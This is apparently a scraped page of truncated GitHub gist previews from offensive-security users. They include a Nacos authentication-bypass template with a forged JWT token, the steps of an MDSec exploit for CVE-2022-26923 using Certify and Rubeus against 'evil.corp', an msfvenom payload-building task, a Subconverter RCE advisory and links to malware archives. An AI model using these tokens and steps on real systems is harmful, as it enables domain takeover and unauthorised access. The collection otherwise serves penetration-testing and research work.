Esonhugh

Bloodhound as a service (Kubernetes Deployments/Docker Compose)

Usage

1. Change password (default password: default_admin_passwords)
2. Change user (default user: esonhugh)
3. Change ingress host name to your team server
4. Deploy it!
5. kubectl apply -f deployment-service.yaml -f ingress.yaml -f configmap.yaml # -n <change namespace you deploy>
6. use pipx install git+https://github.com/exploide/bloodhound-cli.git

Esonhugh

# automatically set the AWS environment variables from the json output of `aws sts assume-role` 
aws_sts_env () {
        if [[ -n "$1" ]]
        then
            local cred=$1
        fi
        if [[ -z "$cred" ]]
        then
                echo "Usage: $0 \`json\`"
                echo "Example: export cred=\`aws sts assume-role --role-arn xxxx --role-session-name xxxx|jq ".Credentials"\`"

Esonhugh

{
    "version": "2.0.0",
    "tasks": [
        {
            "label": "msfvenom payload creating",
            "type": "shell",
            "detail": "msfvenom payload creating task",
            "problemMatcher": [],
            "command": [
                "msfvenom",

0prrr

Recommended Read / Watch

• https://www.vx-underground.org/archive.html
• https://www.vx-underground.org/windows.html
• https://doxygen.reactos.org/index.html
• https://modexp.wordpress.com/
• https://klezvirus.github.io/
• https://zerosum0x0.blogspot.com/
• https://www.binarly.io/posts/index.html
• https://0xdarkvortex.dev/blogs/
• https://cocomelonc.github.io/

Esonhugh

id: nacos-bypass-authentication

variables:
  #token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.vqhkMLKmquQ6R5AD6VWrTOqgClC599nnAQgQLHhPcLc
  # token is signed with a very long time expire.
  # token exp -1
  token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6LTF9.ybUomrBRXZhbUMWVgXRz3Q6zndbF-Zdk4RGpCnV-Ofs

info:
  name: Nacos Bypass Auth with default jwt secret

dmchell

// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Author: @domchell - MDSec
// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)

// Steps:
// 1.       Escalate on any workstation (hint: krbrelayup ftw)
// 2.       Execute UpdateMachineAccount.exe as SYSTEM
// 3.       Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
// 4.       Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)

CwithW

Subconverter v0.7.2 unauthorized RCE

Software Link(Subconverter): https://github.com/tindy2013/subconverter

Affected versions: Subconverter v0.7.2, < v0.7.2-ce8d2bd

Description

A remote code execution (RCE) vulnerability in Subconverter v0.7.2 allows unauthorized attackers to execute arbitrary code via crafted config and url parameters.

Esonhugh

# https://twitter.com/brsn76945860/status/1171233054951501824
# pip install mmh3
#
# in python 3
# Author: https://gist.github.com/yehgdotnet
#
# Author: Esonhugh (https://gist.github.com/Esonhugh) more automatic
# date: 2021/12/07 23:38 UTC+0800

import mmh3

Esonhugh

# Date: 2022-07-10
# Author: Esonhugh
# proxy command to make you switch your commandline fastly

export clash="127.0.0.1"   # define as your favour
export portOfClash="7890"  # define as your favour
proxys(){
        case "$1" in
                (h)
                        echo "|==============================================|"

myl7

#!/bin/bash
set -euo pipefail

# From https://www.v2ex.com/t/811424

function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}